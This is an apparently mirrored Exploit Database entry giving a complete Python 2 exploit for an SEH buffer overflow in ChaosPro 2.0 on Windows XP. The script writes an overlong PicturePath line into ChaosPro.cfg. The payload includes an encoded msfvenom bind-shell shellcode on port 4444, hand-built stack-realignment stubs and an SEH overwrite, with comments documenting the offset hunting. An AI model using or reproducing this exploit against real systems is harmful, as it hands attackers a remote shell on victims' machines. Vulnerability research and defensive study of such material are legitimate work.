ChaosPro 2.0 – Buffer Overflow (SEH)

• Exploit Database
• 14 阅读

• 作者： SYANiDE
  日期： 2019-10-28
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/47551/

• # Exploit Title: ChaosPro 2.0 - Buffer Overflow (SEH)
  # Date: 2019-10-27
  # Exploit Author: Chase Hatch (SYANiDE)
  # Vendor Homepage: http://www.chaospro.de/
  # Software link: http://www.chaospro.de/cpro20.zip
  # Version: 2.0
  # Tested on: Windows XP Pro OEM
  
  #!/usr/bin/env python2
  import os, sys
  
  
  # sploit = "A"* 5000## Crash! 41414141 in SEH! via ProfilePath or PicturePath.Windows XP OEM
  # `locate pattern_create.rb | head -n 1` 5000#326d4431
  # `locate pattern_offset.rb | head -n 1` 326d4431 5000#2705
  # sploit = "A" * (2705 -4 - 126)# 2575
  # sploit = (pattern_create) # `locate pattern_create.rb|head -n 1` 2575 # 0012F51C dump is 61354161, or 61413561 in LE
  # `locate pattern_offset.rb|head -n 1` 61413561 2575
  # 16
  
  
  ################ Second stage ####################
  sploit = "A"*16
  #msfvenom -p windows/shell_bind_tcp LPORT=4444 EXITFUNC=seh 
  #, BufferRegister=ESP -b "\x00" -e x86/alpha_mixed -i 1 -f c
  sploit += (
  "\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
  "\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b"
  "\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42\x58"
  "\x50\x38\x41\x42\x75\x4a\x49\x69\x6c\x6b\x58\x6e\x62\x77\x70"
  "\x75\x50\x57\x70\x71\x70\x6c\x49\x68\x65\x44\x71\x4b\x70\x50"
  "\x64\x4e\x6b\x52\x70\x36\x50\x4c\x4b\x36\x32\x66\x6c\x4e\x6b"
  "\x62\x72\x54\x54\x6e\x6b\x72\x52\x34\x68\x54\x4f\x6d\x67\x50"
  "\x4a\x31\x36\x30\x31\x6b\x4f\x6c\x6c\x55\x6c\x71\x71\x31\x6c"
  "\x53\x32\x76\x4c\x67\x50\x7a\x61\x48\x4f\x56\x6d\x33\x31\x6b"
  "\x77\x58\x62\x4a\x52\x61\x42\x56\x37\x6e\x6b\x52\x72\x52\x30"
  "\x4c\x4b\x71\x5a\x37\x4c\x4e\x6b\x32\x6c\x52\x31\x50\x78\x4b"
  "\x53\x37\x38\x75\x51\x68\x51\x62\x71\x4c\x4b\x46\x39\x45\x70"
  "\x53\x31\x68\x53\x4c\x4b\x51\x59\x64\x58\x4b\x53\x64\x7a\x63"
  "\x79\x6c\x4b\x34\x74\x4c\x4b\x33\x31\x6b\x66\x36\x51\x49\x6f"
  "\x6c\x6c\x7a\x61\x58\x4f\x64\x4d\x67\x71\x68\x47\x70\x38\x4b"
  "\x50\x64\x35\x68\x76\x54\x43\x43\x4d\x58\x78\x67\x4b\x33\x4d"
  "\x56\x44\x72\x55\x79\x74\x43\x68\x4c\x4b\x50\x58\x46\x44\x77"
  "\x71\x58\x53\x65\x36\x4e\x6b\x44\x4c\x62\x6b\x4c\x4b\x32\x78"
  "\x45\x4c\x33\x31\x6a\x73\x6c\x4b\x53\x34\x6e\x6b\x46\x61\x7a"
  "\x70\x4b\x39\x72\x64\x57\x54\x61\x34\x51\x4b\x51\x4b\x35\x31"
  "\x31\x49\x71\x4a\x32\x71\x69\x6f\x69\x70\x73\x6f\x61\x4f\x52"
  "\x7a\x4c\x4b\x65\x42\x4a\x4b\x6e\x6d\x53\x6d\x65\x38\x75\x63"
  "\x35\x62\x67\x70\x45\x50\x51\x78\x70\x77\x71\x63\x55\x62\x43"
  "\x6f\x31\x44\x45\x38\x52\x6c\x43\x47\x65\x76\x43\x37\x49\x6f"
  "\x58\x55\x68\x38\x6c\x50\x43\x31\x67\x70\x73\x30\x55\x79\x6f"
  "\x34\x53\x64\x66\x30\x61\x78\x37\x59\x6b\x30\x52\x4b\x73\x30"
  "\x49\x6f\x39\x45\x52\x4a\x53\x38\x51\x49\x46\x30\x39\x72\x49"
  "\x6d\x67\x30\x42\x70\x71\x50\x66\x30\x63\x58\x48\x6a\x44\x4f"
  "\x39\x4f\x59\x70\x4b\x4f\x4b\x65\x4e\x77\x51\x78\x37\x72\x73"
  "\x30\x47\x61\x43\x6c\x6c\x49\x38\x66\x72\x4a\x76\x70\x52\x76"
  "\x42\x77\x33\x58\x4b\x72\x69\x4b\x47\x47\x35\x37\x69\x6f\x5a"
  "\x75\x63\x67\x31\x78\x6f\x47\x59\x79\x50\x38\x79\x6f\x59\x6f"
  "\x6e\x35\x71\x47\x42\x48\x50\x74\x68\x6c\x47\x4b\x39\x71\x6b"
  "\x4f\x49\x45\x73\x67\x4e\x77\x31\x78\x50\x75\x72\x4e\x62\x6d"
  "\x61\x71\x49\x6f\x58\x55\x65\x38\x51\x73\x70\x6d\x33\x54\x47"
  "\x70\x6b\x39\x7a\x43\x73\x67\x72\x77\x53\x67\x45\x61\x6a\x56"
  "\x30\x6a\x32\x32\x46\x39\x51\x46\x6d\x32\x4b\x4d\x62\x46\x58"
  "\x47\x61\x54\x47\x54\x57\x4c\x36\x61\x53\x31\x6c\x4d\x50\x44"
  "\x44\x64\x56\x70\x69\x56\x57\x70\x53\x74\x71\x44\x62\x70\x42"
  "\x76\x51\x46\x76\x36\x77\x36\x56\x36\x42\x6e\x36\x36\x50\x56"
  "\x30\x53\x42\x76\x42\x48\x42\x59\x58\x4c\x37\x4f\x4b\x36\x69"
  "\x6f\x59\x45\x4b\x39\x6b\x50\x42\x6e\x62\x76\x47\x36\x59\x6f"
  "\x54\x70\x62\x48\x56\x68\x6d\x57\x65\x4d\x31\x70\x59\x6f\x7a"
  "\x75\x6d\x6b\x49\x6e\x66\x6e\x75\x62\x39\x7a\x71\x78\x6e\x46"
  "\x4a\x35\x4d\x6d\x6d\x4d\x79\x6f\x38\x55\x65\x6c\x57\x76\x31"
  "\x6c\x47\x7a\x4d\x50\x79\x6b\x59\x70\x52\x55\x63\x35\x6f\x4b"
  "\x31\x57\x37\x63\x44\x32\x42\x4f\x70\x6a\x35\x50\x51\x43\x69"
  "\x6f\x39\x45\x41\x41"
  ) # 710 bytes
  sploit += "A" * (2575 - 16 - 710)
  
  
  ################ First stage ####################
  
  # ESP: 0012E75C
  # ESP target: 0012FF98
  ## Need to align to four-byte and 16-byte boundaries:
  # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /16" |bc
  # 282.0000
  # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012E75C) /4" |bc
  # 1551.0000
  # echo "ibase=16; obase=10; 0012FF98 - 0012E75C" |bc
  # 183C
  # 0012FF32 54 PUSH ESP
  # 0012FF33 58 POP EAX
  # 0012FF34 66:05 3C18 ADD AX,183C
  # 0012FF38 50 PUSH EAX
  # 0012FF39 5C POP ESP
  sploit += "\x54\x58\x66\x05\x3c\x18\x50\x5c" # 8
  
  
  # target instruction to push onto stack at new ESP:FFE4 JMP ESP # 4141E4FF
  # ./calc_target2.py 4141E4FF 0 7f7f017f 0101017f 3e3e1803
  #0:	25 28 28 28 28 	andeax,0x28282828
  #5:	25 47 47 47 47 	andeax,0x47474747
  #a:	2d 7f 01 7f 7f 	subeax,0x7f7f017f
  #f:	2d 7f 01 01 01 	subeax,0x101017f
  # 14:	2d 03 18 3e 3e 	subeax,0x3e3e1803
  # 19:	50 	push eax
  sploit += (
  	"\x25\x28\x28\x28\x28"
  	"\x25\x47\x47\x47\x47"
  	"\x2d\x7f\x01\x7f\x7f"
  	"\x2d\x7f\x01\x01\x01"
  	"\x2d\x03\x18\x3e\x3e"
  	"\x50"
  ) # 26 bytes
  
  ## Realign new ESP with beginning of overflow buffer:
  ## New ESP should be four-byte and 16-byte aligned:
  # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 16" |bc
  # 122.0000
  # echo "ibase=16; obase=A;scale=4; (0012FF98 - 0012F51C) / 4" |bc
  # 671.0000
  # echo "ibase=16; obase=10;0012FF98 - 0012F51C" |bc
  # A7C
  ## Need to adjust ESP down the stack past the JMP ESP, so push/pop ahead of the JMP ESP we're trying to sled into (keep the sled clean)
  # 0012FF54 44 INC ESP
  # 0012FF55 44 INC ESP
  # 0012FF56 44 INC ESP
  # 0012FF57 44 INC ESP
  # 0012FF58 44 INC ESP
  # 0012FF59 44 INC ESP
  # 0012FF5A 44 INC ESP
  # 0012FF5B 44 INC ESP
  sploit += "\x44\x44\x44\x44\x44\x44\x44\x44" # 8
  
  ## Going to have to carve out the address 0012F51C
  # ./calc_target2.py 0012F51C 0 7f7f017f 61010101 1f6d0864
  # 0:	25 02 02 02 02 	andeax,0x2020202
  # 5:	25 51 51 51 51 	andeax,0x51515151
  # a:	2d 7f 01 7f 7f 	subeax,0x7f7f017f
  # f:	2d 01 01 01 61 	subeax,0x61010101
  #14:	2d 64 08 6d 1f 	subeax,0x1f6d0864
  #19:	50 	push eax
  sploit +=(
  	"\x25\x02\x02\x02\x02"
  	"\x25\x51\x51\x51\x51"
  	"\x2d\x7f\x01\x7f\x7f"
  	"\x2d\x01\x01\x01\x61"
  	"\x2d\x64\x08\x6d\x1f"
  	"\x50"
  ) # 26 bytes
  
  ## Finally, set ESP for the alpha_mixed BufferRegister + JMP ESP
  # 5C POP ESP
  sploit += "\x5c" # 1
  
  sploit += "A" * (126 - 8 - 26 - 8 - 26 - 1)
  
  ################ RET from SEH: JMP SHORT - 126 ####################
  
  sploit += "\xeb\x80" + "\x41\x41" # 4
  # 00401B44|. 5F POP EDI
  # 00401B45|> 5E POP ESI
  # 00401B46\. C3 RETN
  sploit += "\x44\x1b\x40\x00"
  
  
  ################ build the config ####################
  ## Running from just outside base directory of ChaosPro:
  
  def ret_cfg(inp):
  	# do it live in PicturePath
  	cfg = """PicturePath %s""" % inp
  	with open("chaospro\\ChaosPro.cfg",'w') as F:
  		F.write(cfg)
  		F.close()
  
  ret_cfg(sploit)